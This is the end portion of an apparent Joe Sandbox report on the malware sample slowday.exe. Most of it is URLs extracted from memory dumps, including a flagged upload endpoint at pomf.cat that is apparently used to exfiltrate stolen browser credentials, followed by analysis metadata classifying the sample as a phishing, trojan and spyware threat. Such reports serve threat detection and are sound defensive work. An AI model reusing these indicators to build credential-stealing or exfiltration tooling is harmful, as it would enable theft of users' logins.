00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.drfalse
                                                  		high
                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                    		high
                                                    https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msnbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                      		high
                                                      http://crl.pki.goog/GTS1O1core.crl0bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.google.com/chrome/static/images/icon-announcement.svgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                        		high
                                                        https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://cvbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.nirsoft.net/vbc.exe, 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.com/chrome/static/images/homepage/hero-anim-middle.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                              		high
                                                              https://www.google.com/chrome/static/css/main.v3.min.cssbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                		high
                                                                https://www.google.com/chrome/application/x-msdownloadC:bhvBB7.tmp.21.drfalse
                                                                  		high
                                                                  https://www.google.com/chrome/static/images/fallback/icon-file-download.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                    		high
                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeebhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                      		high
                                                                      https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=447687274835vbc.exe, 00000002.00000002.261371537.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.260277725.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.282395197.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282748053.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.298779879.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299948440.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.com/chrome/static/images/download-browser/pixel_phone.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                          		high
                                                                          http://pki.goog/gsr2/GTS1O1.crt0bhvBB7.tmp.21.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1bhvBB7.tmp.21.drfalse
                                                                            		high
                                                                            https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                              		high
                                                                              https://www.google.com/chrome/static/images/app-store-download.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                		high
                                                                                https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                  		high
                                                                                  https://contextual.media.net/bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                    		high
                                                                                    https://pki.goog/repository/0bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                      		high
                                                                                      http://www.msn.com/bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                        		high
                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                          		high
                                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674bhvBB7.tmp.21.drfalse
                                                                                            		high
                                                                                            https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                              		high
                                                                                              https://www.google.com/chrome/static/images/fallback/icon-twitter.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                		high
                                                                                                http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                  		high
                                                                                                  https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3bhvBB7.tmp.21.drfalse
                                                                                                    		high
                                                                                                    https://contextual.media.net/48/nrrV18753.jsbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                      		high
                                                                                                      https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                        		high
                                                                                                        https://www.google.com/accounts/serviceloginvbc.exefalse
                                                                                                          		high
                                                                                                          https://www.google.com/chrome/static/images/homepage/google-enterprise.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                            		high
                                                                                                            https://www.google.com/chrome/static/images/homepage/google-dev.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                              		high
                                                                                                              https://www.google.com/chrome/static/images/thank-you/thankyou-animation.jsonbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                		high
                                                                                                                http://crl.pki.goog/gsr2/gsr2.crl0?bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://pki.goog/gsr2/GTSGIAG3.crt0)bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://www.google.com/bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                  		high
                                                                                                                  https://www.google.com/chrome/static/images/fallback/icon-fb.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                    		high
                                                                                                                    https://www.google.com/chrome/static/images/mac-ico.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                      		high
                                                                                                                      http://pki.goog/gsr2/GTS1O1.crt0#bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://pomf.cat/upload.php&https://a.pomf.cat/slowday.exe, 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, slowday.exe, 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://aefd.nelreports.net/api/report?cat=bingthbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://www.google.com/chrome/static/images/google-play-download.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                        		high
                                                                                                                        https://www.google.com/chrome/static/images/chrome_throbber_fast.gifbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                          		high
                                                                                                                          https://www.google.com/chrome/static/images/homepage/google-canary.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                            		high
                                                                                                                            https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngbhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                              		high
                                                                                                                              https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                                		high
                                                                                                                                https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                  		high
                                                                                                                                  https://www.google.com/chrome/static/images/homepage/laptop_desktop.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.google.com/chrome/static/js/main.v2.min.jsbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                      		high
                                                                                                                                      https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                        		high
                                                                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                          		high
                                                                                                                                          https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96evbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                            		high
                                                                                                                                            https://www.google.com/chrome/static/images/homepage/homepage_privacy.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                              		high
                                                                                                                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhvBB7.tmp.21.drfalse
                                                                                                                                                		high
                                                                                                                                                https://www.google.com/chrome/static/images/fallback/icon-youtube.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://login.yahoo.com/config/loginvbc.exefalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317103637.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330049242.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&vbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://pomf.cat/upload.phpRegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                        • 8%, Virustotal, Browse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        		unknown
                                                                                                                                                        https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173bhvBB7.tmp.21.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.google.com/chrome/static/images/cursor-replay.curbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.google.com/chrome/static/js/installer.min.jsbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://crl.pki.goog/GTSGIAG3.crl0bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtbhvBB7.tmp.21.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://www.google.com/chrome/static/images/download-browser/pixel_tablet.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.google.com/chrome/static/images/homepage/homepage_tools.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://bot.whatismyipaddress.com/RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://pki.goog/gsr2/GTS1O1.crt0Mbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00cbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvAE74.tmp.6.drfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://www.google.com/chrome/static/images/homepage/google-beta.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.msn.com/de-ch/?ocid=iehpvbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343153268.0000000002203000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343183877.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.google.com/chrome/static/images/icon-file-download.svgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634abhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://aefd.nelreports.net/api/report?cat=bingaotbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.jsbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1bhvBB7.tmp.21.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                                                                    		high

                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                    Public IPs

                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious

                                                                                                                                                                                    Private

                                                                                                                                                                                    IP
                                                                                                                                                                                    192.168.2.1

                                                                                                                                                                                    General Information

                                                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                    Analysis ID:614362
                                                                                                                                                                                    Start date and time: 23/04/202219:14:122022-04-23 19:14:12 +02:00
                                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 13m 15s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:light
                                                                                                                                                                                    Sample file name:slowday.exe
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                    Number of analysed new started processes analysed:36
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • HDC enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.phis.troj.spyw.expl.evad.winEXE@24/18@0/1
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                    HDC Information:
                                                                                                                                                                                    • Successful, ratio: 7.5% (good quality ratio 7.4%)
                                                                                                                                                                                    • Quality average: 80.5%
                                                                                                                                                                                    • Quality standard deviation: 21.6%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 85%
                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                                    • Enable AMSI

                                                                                                                                                                                    Warnings

                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
